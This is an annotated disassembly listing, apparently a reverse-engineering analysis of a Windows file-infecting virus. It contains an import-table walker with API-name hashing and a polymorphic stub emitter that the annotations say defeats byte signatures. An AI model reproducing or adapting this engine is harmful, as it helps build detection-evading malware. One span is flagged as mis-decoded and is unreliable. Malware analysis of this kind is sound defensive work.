62205245h, 35303230h, 2E203130h, 3A202E20h dd 494F4A2Dh, 7626204Eh, 75747269h, 0E8550Ah, 5D000000h dd 1DB4ED81h, 85C60040h, 401577h, 9495FF00h, 0C1004035h dd 3C741FE8h, 0B58B1E6Ah, 403550h, 2E3CAC59h, 81662A75h dd 751DFF3Eh, 40BD8D23h, 8B004036h, 0A5570276h, 858DA566h dd 40336Ah, 3390858Fh, 89FA0040h, 4E8CFA46h, 1B1FBFEh dd 43EBCFE2h, 15B1858Dh, 6A500040h, 0FF0E6A00h, 4035A495h dd 247C8300h, 2B750408h, 4E8h, 43465300h, 8895FF00h, 0E8004035h dd 0FFFFFC48h, 7E8h, 43465300h, 534F5Fh, 358895FFh, 31E80040h dd 0E8FFFFFCh, 0FFFFF356h, 13038DFFh, 0BE80040h, 55000000h dd 33524553h, 4C442E32h, 95FF004Ch, 40359Ch, 0AE8h, 70737700h dd 746E6972h, 50004166h, 354895FFh, 85890040h, 403554h dd 8D8D310Fh, 4018E0h, 36468589h, 0FF510040h, 40359C95h dd 4689300h, 8D000000h, 4018EDB5h, 0BD8D5900h, 40362Ch dd 0FFF6D6E8h, 85C766FFh, 401D67h, 0A583F0FFh, 401D69h dd 27958D00h, 5000401Dh, 6A016A54h, 2685200h, 0FF800000h dd 40363095h, 5AC08500h, 8D8D2275h, 401D5Ah, 8D066A52h dd 401D67B5h, 50565400h, 0FF525150h, 40363495h, 95FF5800h dd 40362Ch, 384D85C6h, 0E8000040h, 0Ch, 434F5357h, 2E32334Bh dd 4C4C44h, 359C95FFh, 68930040h, 7, 1844B58Dh, 8D590040h dd 4035FCBDh, 0F651E800h, 0CE8FFFFh, 57000000h, 4E494E49h dd 442E5445h, 0FF004C4Ch, 40359C95h, 0FC08500h, 1E784h dd 5689300h, 8D000000h, 401882B5h, 0BD8D5900h, 403618h dd 0FFF61AE8h, 1CBD83FFh, 4036h, 1C2840Fh, 0EC810000h dd 190h, 1016854h, 95FF0000h, 4035FCh, 190C481h, 8B500000h dd 52006AD4h, 361C95FFh, 0C0850040h, 680D7559h, 1388h dd 35BC95FFh, 0E2EB0040h, 1D69BD83h, 75000040h, 6D858D29h dd 5000401Dh, 360895FFh, 0C0850040h, 13B840Fh, 408B0000h dd 0FF008B0Ch, 69858F30h, 0C600401Dh, 40384D85h, 6A0100h dd 26A016Ah, 361495FFh, 0F8830040h, 12840FFFh, 93000001h dd 1D65958Dh, 106A0040h, 95FF5352h, 403604h, 850FC085h dd 0F2h, 1D86BD8Dh, 8B10040h, 0FFFABCE8h, 9468FFh, 2B5E0000h dd 243489E6h, 9895FF54h, 8D004035h, 401D94BDh, 0E801B100h dd 0FFFFFA9Dh, 1024448Bh, 0B08E0C1h, 0C1042444h, 440B08E0h dd 0E8500824h, 5, 78362E25h, 95FF5700h, 403554h, 0C60CC483h dd 
8D200647h, 401D8195h, 68006A00h, 21h, 95FF5352h, 403610h dd 14247C8Dh, 5895FF57h, 0C6004035h, 400A3804h, 5750006Ah dd 1095FF53h, 3004036h, 0A2BD8DE6h, 6A00401Dh, 0C6800h dd 53570000h, 361095FFh, 0C3D0040h, 75000000h, 4EB58D4Dh dd 8D004036h, 40384D8Dh, 6ACE2B00h, 53565100h, 360C95FFh dd 0F8830040h, 912F7E00h, 0B58DFE8Bh, 40364Eh, 0AEF20DB0h dd 0E8601075h, 0FFFFFAF8h, 0E3177261h, 1778D09h, 0CF8BEAEBh dd 0BD8DCE2Bh, 40364Eh, 0F787A4F3h, 0FF53B9EBh, 40360095h dd 77BD8000h, 1004015h, 30682A74h, 0FF000075h, 4035BC95h dd 4DBD8000h, 4038h, 85C71174h, 401D69h, 0 dd 384D85C6h, 0E9000040h, 0FFFFFE56h, 158085C7h, 40h, 0C25D8000h dd 0A0D0004h, 6F6E204Fh, 6F206E6Fh, 696C2066h, 20216566h dd 6974204Fh, 7420656Dh, 6563206Fh, 7262656Ch, 21657461h dd 20200A0Dh, 4F202020h, 6D757320h, 2072656Dh, 64726167h dd 0D216E65h, 6C65520Ah, 6C746E65h, 6C737365h, 61682079h dd 20797070h, 20646E61h, 65707865h, 6E617463h, 73202C74h dd 646E6174h, 3A676E69h, 0A0D2D20h, 63746157h, 676E6968h dd 6C6C6120h, 79616420h, 646E6120h, 67696E20h, 202C7468h dd 20726F66h, 65697266h, 2073646Eh, 61772049h, 0D3A7469h dd 6568570Ah, 61206572h, 79206572h, 202C756Fh, 65697266h dd 3F73646Eh, 6D6F4320h, 49202165h, 73692074h, 6D697420h dd 49202165h, 20732774h, 6574616Ch, 6A0A0D21h, 0ED606EF9h dd 474FD479h, 486299ADh, 4403752h, 2930C784h, 0E510A614h dd 1327B1FAh, 7E10A614h, 571A73C1h, 5C3AAB59h, 52C26CCCh dd 0D8B8B3h, 13h dup(0) db 3 dup(0) ; =============== S U B R O U T I N E ======================================= sub_3150C557 proc near ; CODE XREF: sub_3150C59E:loc_3150C5FBp ; sub_3150C65E+7p ... 
arg_0 = dword ptr 4 pusha and dword ptr [ebp+4039A6h], 0 and dword ptr [ebp+4039AAh], 0 movzx eax, word ptr [ebx+14h] lea edx, [ebx+18h] movzx ecx, word ptr [ebx+6] add edx, eax loc_3150C573: ; CODE XREF: sub_3150C557+41j mov eax, [esp+20h+arg_0] sub eax, [edx+0Ch] jb short loc_3150C595 cmp eax, [edx+8] jnb short loc_3150C595 mov eax, [edx+14h] sub eax, [edx+0Ch] mov [ebp+4039A6h], edx mov [ebp+4039AAh], eax jmp short loc_3150C59A ; --------------------------------------------------------------------------- loc_3150C595: ; CODE XREF: sub_3150C557+23j ; sub_3150C557+28j add edx, 28h loop loc_3150C573 loc_3150C59A: ; CODE XREF: sub_3150C557+3Cj popa retn 4 sub_3150C557 endp ; =============== S U B R O U T I N E ======================================= sub_3150C59E proc near ; CODE XREF: UPX2:3150C8CAp ; UPX2:3150C8F0p mov [ebp+4022F7h], al call sub_3150C60D push 20h lea eax, [ebp+402224h] pop ecx loc_3150C5B5: ; CODE XREF: sub_3150C59E+1Ej cmp [eax], ebx jz short loc_3150C5C5 add eax, 4 loop loc_3150C5B5 inc dword ptr [ebp+40398Eh] retn ; --------------------------------------------------------------------------- loc_3150C5C5: ; CODE XREF: sub_3150C59E+19j neg ecx add ecx, [ebp+4022F7h] jecxz short loc_3150C5DF loc_3150C5CF: ; CODE XREF: sub_3150C59E+39j push dword ptr [eax-4] pop dword ptr [eax] sub eax, 4 loop loc_3150C5CF mov [ebp+402224h], ebx loc_3150C5DF: ; CODE XREF: sub_3150C59E+2Fj ; sub_3150C60D+34j cmp dword ptr [edx], 0 jz short loc_3150C5E9 sub esi, [edx] add esi, [edx+10h] loc_3150C5E9: ; CODE XREF: sub_3150C59E+44j lea ecx, [esi-4] pop eax pop ebx pop esi cmp dword ptr [edx], 0 jz short loc_3150C5F8 push dword ptr [edx] jmp short loc_3150C5FB ; --------------------------------------------------------------------------- loc_3150C5F8: ; CODE XREF: sub_3150C59E+54j push dword ptr [edx+10h] loc_3150C5FB: ; CODE XREF: sub_3150C59E+58j call sub_3150C557 sub ecx, esi sub ecx, [ebp+4039AAh] pop eax add ecx, [ebx+34h] retn sub_3150C59E endp ; sp-analysis failed 
; =============== S U B R O U T I N E =======================================
; NOTE(review): collapsed listing restored to one statement per line; instruction
; text is unchanged.
;
; sub_3150C60D: two passes over sub_3150C65E.
;  pass 1: callback = this routine's own return address, counter [ebp+40398Eh]
;          starts at 0 (the callback in sub_3150C59E increments it);
;  then sub_3150BDA2 is called with eax = counter (helper defined outside this
;          excerpt; callers read edx afterwards - presumably a bounded random
;          value, verify);
;  pass 2: via sub_3150C64A with the counter preset to edx.
sub_3150C60D proc near ; CODE XREF: sub_3150C59E+6p
    pop dword ptr [ebp+403992h]             ; return address kept as callback pointer
    mov dword ptr [ebp+40398Eh], 0
    call sub_3150C65E
    mov eax, [ebp+40398Eh]
    call sub_3150BDA2
    call sub_3150C64A
    cmp dword ptr [ebp+40398Eh], 0
    jnz short loc_3150C643
    mov [ebp+4022A0h], ebx
    jmp short loc_3150C5DF
; ---------------------------------------------------------------------------
loc_3150C643: ; CODE XREF: sub_3150C60D+2Cj
    dec dword ptr [ebp+40398Eh]
    retn
sub_3150C60D endp ; sp-analysis failed

; =============== S U B R O U T I N E =======================================
; sub_3150C64A: same return-address-as-callback idiom; sets the counter to edx,
; runs the walker, returns ecx = 0.
sub_3150C64A proc near ; CODE XREF: sub_3150C60D+20p
    pop dword ptr [ebp+403992h]
    mov [ebp+40398Eh], edx
    call sub_3150C65E
    xor ecx, ecx
    retn
sub_3150C64A endp ; sp-analysis failed

; =============== S U B R O U T I N E =======================================
; sub_3150C65E: walks a table of 14h-byte records located through [ebx+80h]
; and calls [ebp+403992h] for selected names.
; In:  ebx = NT headers of the mapped file (callers set base + [base+3Ch]),
;      esi = base of the mapping, [ebp+403992h] = callback.
; With ebx at the "PE" signature, +80h is the import directory RVA and each
; record is an import descriptor (+0 OriginalFirstThunk, +0Ch Name,
; +10h FirstThunk).
; Only modules whose name is at least six characters long and ends in "32"
; (before ".DLL" or the terminator) are processed. For each by-name import a
; 32-bit hash of the lower-cased name is built as ebx = ebx*15 - char.
sub_3150C65E proc near ; CODE XREF: sub_3150C60D+10p
                       ; sub_3150C64A+Cp ...
var_C = dword ptr -0Ch
var_4 = dword ptr -4
    mov edx, [ebx+80h]
    push edx
    call sub_3150C557                       ; sets the RVA-to-file delta
    add edx, [ebp+4039AAh]
    add edx, esi                            ; edx = first record in the mapping
loc_3150C672: ; CODE XREF: sub_3150C65E+120j
    cmp dword ptr [edx+0Ch], 0
    jz locret_3150C783                      ; end of table
    cmp dword ptr [edx+10h], 0
    jz locret_3150C783
    mov eax, [edx+0Ch]
    push eax
    call sub_3150C557
    add eax, [ebp+4039AAh]
    add eax, esi                            ; eax = module-name string
    push eax                                ; keep the start for the length test
loc_3150C698: ; CODE XREF: sub_3150C65E+47j
    mov cl, [eax]
    cmp cl, 0
    jz short loc_3150C6B8
    cmp cl, 2Eh                             ; '.'
    jz short loc_3150C6A7
loc_3150C6A4: ; CODE XREF: sub_3150C65E+58j
    inc eax
    jmp short loc_3150C698
; ---------------------------------------------------------------------------
loc_3150C6A7: ; CODE XREF: sub_3150C65E+44j
    mov ecx, [eax+1]
    and ecx, 0DFDFDFDFh                     ; fold ASCII letters to upper case
    cmp ecx, 4C4C44h                        ; "DLL",0
    jnz short loc_3150C6A4
loc_3150C6B8: ; CODE XREF: sub_3150C65E+3Fj
    pop ecx
    sub ecx, eax                            ; ecx = -(length of the name stem)
    cmp ecx, 0FFFFFFFAh
    jg loc_3150C77B                         ; stem shorter than six characters
    cmp word ptr [eax-2], 3233h             ; last two stem characters "32"
    jnz loc_3150C77B
    push esi
    cmp dword ptr [edx], 0
    jnz short loc_3150C6DB
    mov ecx, [edx+10h]                      ; fall back to +10h when +0 is empty
    jmp short loc_3150C6DD
; ---------------------------------------------------------------------------
loc_3150C6DB: ; CODE XREF: sub_3150C65E+76j
    mov ecx, [edx]
loc_3150C6DD: ; CODE XREF: sub_3150C65E+7Bj
    add esi, ecx
    push ecx
    call sub_3150C557
    add esi, [ebp+4039AAh]                  ; esi = thunk array in the mapping
loc_3150C6EB: ; CODE XREF: sub_3150C65E+90j
              ; sub_3150C65E+117j
    lodsd
    test eax, eax
    js short loc_3150C6EB                   ; top bit set: skipped (import by ordinal)
    jz loc_3150C77A                         ; zero terminates the array
    push dword ptr [ebp+4039AAh]            ; preserve the delta across the lookup
    push eax
    call sub_3150C557
    add eax, [ebp+4039AAh]
    pop dword ptr [ebp+4039AAh]
    add eax, [esp+4+var_4]                  ; + mapping base saved by `push esi`
    push ebx
    add eax, 2                              ; skip the two bytes before the name
    xor ebx, ebx
loc_3150C717: ; CODE XREF: sub_3150C65E+CEj
    movzx ecx, byte ptr [eax]
    jecxz short loc_3150C72E
    or cl, 20h                              ; lower-case the character
    push ebx
    shl [esp+0Ch+var_C], 4
    sub [esp+0Ch+var_C], ebx
    sub [esp+0Ch+var_C], ecx
    pop ebx                                 ; ebx = ebx*16 - ebx - char
    inc eax
    jmp short loc_3150C717
; ---------------------------------------------------------------------------
loc_3150C72E: ; CODE XREF: sub_3150C65E+BCj
    ; names hashing to one of these eight constants never reach the callback
    cmp ebx, 0DDBBD70Fh
    jz short loc_3150C774
    cmp ebx, 0DB6E45A8h
    jz short loc_3150C774
    cmp ebx, 0FFA13B59h
    jz short loc_3150C774
    cmp ebx, 0ACB522D6h
    jz short loc_3150C774
    cmp ebx, 0F358E993h
    jz short loc_3150C774
    cmp ebx, 0F358E97Dh
    jz short loc_3150C774
    cmp ebx, 0E1253F46h
    jz short loc_3150C774
    cmp ebx, 0E1253F30h
    jz short loc_3150C774
    call dword ptr [ebp+403992h]            ; callback; may not return here (see sub_3150C59E)
loc_3150C774: ; CODE XREF: sub_3150C65E+D6j
              ; sub_3150C65E+DEj ...
; NOTE(review): collapsed listing restored to one statement per line; instruction
; text is unchanged. The first statements finish sub_3150C65E (loop tail).
    pop ebx
    jmp loc_3150C6EB
; ---------------------------------------------------------------------------
loc_3150C77A: ; CODE XREF: sub_3150C65E+92j
    pop esi
loc_3150C77B: ; CODE XREF: sub_3150C65E+60j
              ; sub_3150C65E+6Cj
    add edx, 14h                            ; next 14h-byte record
    jmp loc_3150C672
; ---------------------------------------------------------------------------
locret_3150C783: ; CODE XREF: sub_3150C65E+18j
                 ; sub_3150C65E+22j
    retn
sub_3150C65E endp

; ---------------------------------------------------------------------------
    db 0

; =============== S U B R O U T I N E =======================================
; sub_3150C785: writes a variable-length byte sequence at edi.
; sub_3150BDA2 is defined outside this excerpt; every call loads eax first and
; uses edx/dl afterwards - presumably a bounded random value, verify.
; Emits: one word built from 1831h with dl merged into the second byte, then
; ecx = edx+8 items, each either a single byte 50h+[ebp+4024D1h] or the byte
; 68h followed by a dword (a single set bit, or 80000000h).
; 31h / 50h+r / 68h are the x86 encodings of xor r,r / push r / push imm32.
sub_3150C785 proc near ; CODE XREF: UPX2:3150C8C3p
                       ; UPX2:3150C8E9p
    push 4
    pop eax
    call sub_3150BDA2
    mov [ebp+4024D1h], dl                   ; remembered for the 50h+r items below
    mov ax, 1831h
    add ah, dl
    shl ah, 3
    add ah, dl                              ; second byte = 0C0h + dl*9
    stosw
    push 6
    pop eax
    call sub_3150BDA2
    add edx, 8
    xchg edx, ecx                           ; ecx = item count
loc_3150C7AD: ; CODE XREF: sub_3150C785:loc_3150C7ECj
    push 5
    pop eax
    call sub_3150BDA2
    cmp dl, 3
    jnb short loc_3150C7C5
    mov al, 50h
    add al, [ebp+4024D1h]
    stosb
    jmp short loc_3150C7EC
; ---------------------------------------------------------------------------
loc_3150C7C5: ; CODE XREF: sub_3150C785+33j
    push 68h
    pop eax
    stosb
    cmp dl, 3
    jnz short loc_3150C7E6
    mov al, 11h
    call sub_3150BDA2
    mov eax, 1
loc_3150C7DA: ; CODE XREF: sub_3150C785+5Dj
    test dl, dl
    jz short loc_3150C7EB
    shl eax, 1                              ; eax = 1 << dl
    dec dl
    jmp short loc_3150C7DA
; ---------------------------------------------------------------------------
    jmp short loc_3150C7EB                  ; unreachable as listed
; ---------------------------------------------------------------------------
loc_3150C7E6: ; CODE XREF: sub_3150C785+47j
    mov eax, 80000000h
loc_3150C7EB: ; CODE XREF: sub_3150C785+57j
              ; sub_3150C785+5Fj
    stosd
loc_3150C7EC: ; CODE XREF: sub_3150C785+3Ej
    loop loc_3150C7AD
    retn
sub_3150C785 endp

; ---------------------------------------------------------------------------
; loc_3150C7EF (called from sub_3150D249, ends with `retn 4`): writes a byte
; sequence into the buffer at [ebp+40343Ch] through edi using stosb/stosw/stosd.
; Every `test dword ptr [ebp+403431h], mask` picks between alternative byte
; encodings, and the bytes at [ebp+403429h..40342Bh] are merged into the
; stored opcode bytes. The constants are x86 opcodes (0E8h call, 0E9h jmp,
; 15FFh call [mem], ...), so this reads as a variable-form stub emitter:
; byte signatures taken from one emitted stub are unlikely to match another.
; [ebp+403431h] and [ebp+403429h..] are randomised in sub_3150D249 first.
loc_3150C7EF: ; CODE XREF: sub_3150D249+112p
    lea edi, [ebp+40343Ch]
    test dword ptr [ebp+403431h], 80000000h
    jz short loc_3150C804
    mov al, 60h                             ; 60h = pusha
    stosb
loc_3150C804: ; CODE XREF: UPX2:3150C7FFj
    test dword ptr [ebp+403431h], 1000003h
    jz loc_3150C90A
; ---------------------------------------------------------------------------
; NOTE(review): disassembler desynchronisation. A lone `db 0B8h` followed by
; `push ebp / mov ebp, esp / call ...` is presumably a `mov eax, imm32` whose
; immediate was decoded as code; [ebp+403996h] is read at loc_3150C892 but
; never visibly written, which suggests the store hides in these bytes.
; Re-decode from the raw bytes before relying on the next five statements.
    db 0B8h
; ---------------------------------------------------------------------------
    push ebp
    mov ebp, esp
    call near ptr 0EEDA73C8h
    xchg eax, esi
    cmp [eax+0], eax
    mov al, 0E8h
    stosb
    stosd                                   ; placeholder displacement, patched below
    test dword ptr [ebp+403431h], 1000000h
    mov [ebp+40399Ah], edi                  ; remember position for later patching
    jz short loc_3150C882
    test dword ptr [ebp+403431h], 2000000h
    mov eax, 36FF6467h
    jnz short loc_3150C84D
    mov eax, 2E8B6467h
loc_3150C84D: ; CODE XREF: UPX2:3150C846j
    stosd
    mov ax, 0                               ; mov leaves the flags from the test intact
    stosw
    jz short loc_3150C859
    mov al, 5Dh
    stosb
loc_3150C859: ; CODE XREF: UPX2:3150C854j
    test dword ptr [ebp+403431h], 8000000h
    mov eax, 86D8Dh
    jnz short loc_3150C880
    test dword ptr [ebp+403431h], 4000000h
    mov eax, 8C583h
    jz short loc_3150C880
    mov eax, 0F8ED83h
loc_3150C880: ; CODE XREF: UPX2:3150C868j
              ; UPX2:3150C879j
    stosd
    dec edi                                 ; only three of the four bytes are kept
loc_3150C882: ; CODE XREF: UPX2:3150C835j
    test dword ptr [ebp+403431h], 3
    jz short loc_3150C892
    mov al, 0E9h
    stosb
    stosd
loc_3150C892: ; CODE XREF: UPX2:3150C88Cj
    mov eax, [ebp+403996h]
    mov ecx, edi
    sub ecx, eax
    mov [eax-4], ecx                        ; back-patch: distance from saved position
    test dword ptr [ebp+403431h], 3
    jz short loc_3150C90A
    mov eax, 36FF6467h
    mov [ebp+40399Eh], edi
    stosd
    mov eax, 64670000h
    stosd
    mov eax, 2689h
    stosd
    call sub_3150C785
    mov al, 20h
    call sub_3150C59E                       ; returns ecx (0 = nothing selected)
    jecxz short loc_3150C90A
    mov ax, 15FFh                           ; FFh 15h = call dword ptr [imm32]
    stosw
    xchg eax, ecx
    stosd                                   ; operand = value returned in ecx
    mov edx, [ebp+403431h]
    not edx
    test edx, 3
    jnz short loc_3150C8FD                  ; second call only when both low bits are set
    call sub_3150C785
    mov al, 1Fh
    call sub_3150C59E
    mov ax, 15FFh
    stosw
    xchg eax, ecx
    stosd
loc_3150C8FD: ; CODE XREF: UPX2:3150C8E7j
    mov ecx, edi
    mov eax, [ebp+40399Eh]
    sub ecx, eax
    mov [eax-4], ecx
loc_3150C90A: ; CODE XREF: UPX2:3150C80Ej
              ; UPX2:3150C8A9j ...
; NOTE(review): collapsed listing restored to one statement per line; instruction
; text is unchanged. This span is the middle of the emitter that starts at
; loc_3150C7EF: edi is the output cursor, [ebp+403431h] is the option bitmask,
; [ebp+403429h], [ebp+40342Ah] and [ebp+40342Bh] are merged into opcode bytes
; (they are shuffled in sub_3150D249, which also rejects some values), and
; [ebp+40342Fh] / [ebp+403430h] are emitted as immediates. Positions saved in
; [ebp+403982h], [ebp+403986h], [ebp+4039A2h] and [ebp+40398Ah] are patched
; later in the same routine or in sub_3150D249.
    test dword ptr [ebp+403431h], 4
    jz short loc_3150C928
    mov eax, 0C8FEC029h
    stosd
    mov eax, 474C008h
    stosd
    mov eax, 67EBF875h
    stosd
loc_3150C928: ; CODE XREF: UPX2:3150C914j
    test dword ptr [ebp+403431h], 8
    jnz short loc_3150C97E
    cmp byte ptr [ebp+40342Fh], 0
    jz short loc_3150C97E
    mov eax, 0C9291829h
    or ah, [ebp+40342Bh]
    shl ah, 3
    or ah, [ebp+40342Bh]
    stosd
    mov al, 0B1h
    stosb
    mov al, [ebp+40342Fh]
    stosb
    mov al, 40h
    or al, [ebp+40342Bh]
    stosb
    mov ax, 0FDE2h
    test dword ptr [ebp+403431h], 10h
    jz short loc_3150C97C
    mov al, 49h
    stosb
    mov ax, 0FC75h
loc_3150C97C: ; CODE XREF: UPX2:3150C973j
    stosw
loc_3150C97E: ; CODE XREF: UPX2:3150C932j
              ; UPX2:3150C93Bj
    mov al, 0E8h
    stosb
    xor eax, eax
    stosd                                   ; zero displacement, patched via [ebp+403982h]
    mov [ebp+403982h], edi
    test dword ptr [ebp+403431h], 20h
    jnz short loc_3150C99F
    mov al, 58h
    or al, [ebp+403429h]
    stosb
loc_3150C99F: ; CODE XREF: UPX2:3150C994j
    mov ax, 0C081h
    test dword ptr [ebp+403431h], 40h
    jz short loc_3150C9B2
    add ah, 28h
loc_3150C9B2: ; CODE XREF: UPX2:3150C9ADj
    or ah, [ebp+403429h]
    stosw
    mov [ebp+403986h], edi                  ; operand slot filled at the end of the routine
    stosd
    test dword ptr [ebp+403431h], 40000000h
    jnz short loc_3150C9D6
    mov al, 50h
    add al, [ebp+403429h]
    stosb
loc_3150C9D6: ; CODE XREF: UPX2:3150C9CBj
    test dword ptr [ebp+403431h], 80h
    jnz short loc_3150C9ED
    mov al, 0B8h
    or al, [ebp+40342Ah]
    stosb
    jmp short loc_3150CA2A
; ---------------------------------------------------------------------------
loc_3150C9ED: ; CODE XREF: UPX2:3150C9E0j
    mov ax, 1831h
    test dword ptr [ebp+403431h], 100h
    jz short loc_3150C9FF
    mov al, 29h
loc_3150C9FF: ; CODE XREF: UPX2:3150C9FBj
    or ah, [ebp+40342Ah]
    shl ah, 3
    or ah, [ebp+40342Ah]
    stosw
    mov ax, 0F081h
    test dword ptr [ebp+403431h], 200h
    jnz short loc_3150CA22
    mov ah, 0C8h
loc_3150CA22: ; CODE XREF: UPX2:3150CA1Ej
    or ah, [ebp+40342Ah]
    stosw
loc_3150CA2A: ; CODE XREF: UPX2:3150C9EBj
    mov [ebp+4039A2h], edi                  ; position of the 243Ch dword
    mov eax, 243Ch
    stosd
    test dword ptr [ebp+403431h], 8
    jz short loc_3150CAAE
    test dword ptr [ebp+403431h], 400h
    jnz short loc_3150CA59
    mov al, 0B8h
    or al, [ebp+40342Bh]
    stosb
    jmp short loc_3150CAA6
; ---------------------------------------------------------------------------
loc_3150CA59: ; CODE XREF: UPX2:3150CA4Cj
    test dword ptr [ebp+403431h], 800h
    jnz short loc_3150CA76
    mov ax, 0E083h
    or ah, [ebp+40342Bh]
    stosw
    xor eax, eax
    stosb
    jmp short loc_3150CA8B
; ---------------------------------------------------------------------------
loc_3150CA76: ; CODE XREF: UPX2:3150CA63j
    mov ax, 1829h
    or ah, [ebp+40342Bh]
    shl ah, 3
    or ah, [ebp+40342Bh]
    stosw
loc_3150CA8B: ; CODE XREF: UPX2:3150CA74j
    test dword ptr [ebp+403431h], 1000h
    mov ax, 0C081h
    jz short loc_3150CA9E
    add ah, 8
loc_3150CA9E: ; CODE XREF: UPX2:3150CA99j
    or ah, [ebp+40342Bh]
    stosw
loc_3150CAA6: ; CODE XREF: UPX2:3150CA57j
    movzx eax, byte ptr [ebp+40342Fh]
    stosd
loc_3150CAAE: ; CODE XREF: UPX2:3150CA40j
    test dword ptr [ebp+403431h], 40000000h
    jz short loc_3150CAC3
    mov al, 50h
    add al, [ebp+403429h]
    stosb
loc_3150CAC3: ; CODE XREF: UPX2:3150CAB8j
    test dword ptr [ebp+403431h], 2000h
    mov al, 86h
    jnz short loc_3150CAD3
    add al, 4
loc_3150CAD3: ; CODE XREF: UPX2:3150CACFj
    lea ecx, [edi-2]
    mov ah, [ebp+403429h]
    mov [ebp+40398Ah], ecx                  ; later turned into a short-branch offset
    stosw
    cmp ah, 5
    jnz short loc_3150CAF0
    mov al, 0                               ; value 5 gets an extra zero byte and bit 40h
    or byte ptr [edi-1], 40h
    stosb
loc_3150CAF0: ; CODE XREF: UPX2:3150CAE7j
    test dword ptr [ebp+403431h], 4000h
    mov ax, 3166h
    jnz short loc_3150CB02
    mov ah, 29h
loc_3150CB02: ; CODE XREF: UPX2:3150CAFEj
    stosw
    mov al, 18h
    or al, [ebp+40342Bh]
    shl al, 3
    stosb
    mov al, 88h
    test dword ptr [ebp+403431h], 8000h
    jnz short loc_3150CB20
    mov al, 86h
loc_3150CB20: ; CODE XREF: UPX2:3150CB1Cj
    mov ah, [ebp+403429h]
    stosw
    cmp ah, 5
    jnz short loc_3150CB34
    mov al, 0
    or byte ptr [edi-1], 40h
    stosb
loc_3150CB34: ; CODE XREF: UPX2:3150CB2Bj
    test dword ptr [ebp+403431h], 10000h
    jnz short loc_3150CB4B
    mov al, 40h
    or al, [ebp+403429h]
    stosb
    jmp short loc_3150CB5A
; ---------------------------------------------------------------------------
loc_3150CB4B: ; CODE XREF: UPX2:3150CB3Ej
    mov ax, 0C083h
    or ah, [ebp+403429h]
    stosw
    mov al, 1
    stosb
loc_3150CB5A: ; CODE XREF: UPX2:3150CB49j
; NOTE(review): collapsed listing restored to one statement per line; instruction
; text is unchanged. This span holds the end of the emitter that starts at
; loc_3150C7EF (edi = output cursor, [ebp+403431h] = option bitmask), then
; sub_3150CE1D and the head of sub_3150CFD6.
    test dword ptr [ebp+403431h], 20000h
    jnz short loc_3150CB95
    test dword ptr [ebp+403431h], 40000h
    jnz short loc_3150CB8C
    mov al, 0C0h
    or al, [ebp+40342Bh]
    mov ah, [ebp+403430h]
    shl eax, 10h
    mov ax, 8166h
    stosd
    mov al, 0
    jmp short loc_3150CB94
; ---------------------------------------------------------------------------
loc_3150CB8C: ; CODE XREF: UPX2:3150CB70j
    mov al, 40h
    or al, [ebp+40342Bh]
loc_3150CB94: ; CODE XREF: UPX2:3150CB8Aj
    stosb
loc_3150CB95: ; CODE XREF: UPX2:3150CB64j
    test dword ptr [ebp+403431h], 80000h
    jnz short loc_3150CBB1
    mov ax, 0E883h
    or ah, [ebp+40342Ah]
    stosw
    mov al, 1
    jmp short loc_3150CBB9
; ---------------------------------------------------------------------------
loc_3150CBB1: ; CODE XREF: UPX2:3150CB9Fj
    mov al, 48h
    or al, [ebp+40342Ah]
loc_3150CBB9: ; CODE XREF: UPX2:3150CBAFj
    stosb
    test dword ptr [ebp+403431h], 100000h
    mov cl, 75h                             ; 75h = jnz rel8
    jnz short loc_3150CBED
    mov ax, 0F883h
    or ah, [ebp+40342Ah]
    stosw
    xor eax, eax
    stosb
    sub [ebp+40398Ah], edi                  ; saved position - cursor = backward offset
    test dword ptr [ebp+403431h], 200000h
    jnz short loc_3150CC08
    mov cl, 77h                             ; 77h = ja rel8
    jmp short loc_3150CC08
; ---------------------------------------------------------------------------
loc_3150CBED: ; CODE XREF: UPX2:3150CBC6j
    mov ax, 1809h
    or ah, [ebp+40342Ah]
    shl ah, 3
    or ah, [ebp+40342Ah]
    stosw
    sub [ebp+40398Ah], edi
loc_3150CC08: ; CODE XREF: UPX2:3150CBE7j
              ; UPX2:3150CBEBj
    mov al, cl
    mov ah, [ebp+40398Ah]                   ; low byte of the offset computed above
    stosw
    mov al, 58h
    add al, [ebp+403429h]
    stosb
    test dword ptr [ebp+403431h], 1000003h
    jz loc_3150CCB2
    mov eax, 268B6467h
    mov ecx, [ebp+403431h]
    xor ecx, 2000000h
    test ecx, 3000000h
    jnz short loc_3150CC49
    mov eax, 2E876467h
loc_3150CC49: ; CODE XREF: UPX2:3150CC42j
    stosd
    mov eax, 0                              ; mov leaves the flags from the test intact
    stosw
    jnz short loc_3150CC59
    mov ax, 0E58Bh
    stosw
loc_3150CC59: ; CODE XREF: UPX2:3150CC51j
    mov eax, 68F6764h
    stosd
    xor eax, eax
    stosw
    test dword ptr [ebp+403431h], 1000000h
    jnz short loc_3150CCAF
    test dword ptr [ebp+403431h], 8000000h
    jz short loc_3150CCA1
    mov ax, 6C8Dh
    test dword ptr [ebp+403431h], 2000000h
    setnz cl
    or ah, cl
    stosw
    test cl, cl
    jnz short loc_3150CC9C
    mov ax, 424h
    stosw
    jmp short loc_3150CCAF
; ---------------------------------------------------------------------------
loc_3150CC9C: ; CODE XREF: UPX2:3150CC92j
    mov al, 8
    stosb
    jmp short loc_3150CCAF
; ---------------------------------------------------------------------------
loc_3150CCA1: ; CODE XREF: UPX2:3150CC79j
    mov ax, 5D58h
    add al, [ebp+40342Bh]
    stosw
    jmp short loc_3150CCB2
; ---------------------------------------------------------------------------
loc_3150CCAF: ; CODE XREF: UPX2:3150CC6Dj
              ; UPX2:3150CC9Aj ...
    mov al, 0C9h                            ; 0C9h = leave
    stosb
loc_3150CCB2: ; CODE XREF: UPX2:3150CC25j
              ; UPX2:3150CCADj
    test dword ptr [ebp+403431h], 80000000h
    jz short loc_3150CCDE
    mov al, 7
    sub al, [ebp+403429h]
    shl eax, 1Ah
    or eax, 240889h
    add ah, [ebp+403429h]
    shl ah, 3
    add ah, 4
    stosd
    mov al, 61h                             ; 61h = popa (pairs with the 60h emitted first)
    stosb
loc_3150CCDE: ; CODE XREF: UPX2:3150CCBCj
    mov ax, 0E0FFh                          ; FFh E0h+r = jmp reg
    or ah, [ebp+403429h]
    stosw
    test dword ptr [ebp+403431h], 20h
    jz short loc_3150CD49
    test dword ptr [ebp+403431h], 20000000h
    jz short loc_3150CD0F
loc_3150CD02: ; CODE XREF: UPX2:3150CD0Dj
    test edi, 3
    jz short loc_3150CD0F
    mov al, 90h                             ; pad with 90h up to a 4-byte boundary
    stosb
    jmp short loc_3150CD02
; ---------------------------------------------------------------------------
